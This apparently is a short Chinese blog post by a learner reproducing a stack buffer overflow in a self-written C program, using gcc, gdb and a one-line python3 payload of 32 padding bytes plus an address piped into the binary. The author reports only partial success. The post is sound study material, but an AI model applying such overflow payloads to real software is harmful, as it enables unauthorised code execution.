【二进制漏洞】缓冲区溢出漏洞

天命:好像复现成功了,又好像没有完全成功

学习视频:抓住漏洞!缓冲区溢出漏洞利用实例,如何利用溢出执行Shell Code_哔哩哔哩_bilibili

漏洞复现

实验环境:kali  (其实啥都试过,windows,ubuntu16,云服务器,效果都是一样)

先写一个.c文件,里面写一个不会被调用的函数

【二进制漏洞】缓冲区溢出漏洞_第1张图片

gcc a.c  # 编译成可执行文件
gdb a.out # 进入调式

查看main函数的反汇编代码

【二进制漏洞】缓冲区溢出漏洞_第2张图片

这一行应该就是缓冲区了,16进制的20就是十进制的32

写上exp攻击试试

python3 -c "print('a'*32+'\x49\x11\x00\x00\x00\x00\x00\x00')" | ./a.out

【二进制漏洞】缓冲区溢出漏洞_第3张图片

好消息:真的有溢出

坏消息:没有覆盖函数入口

你可能感兴趣的:(安全)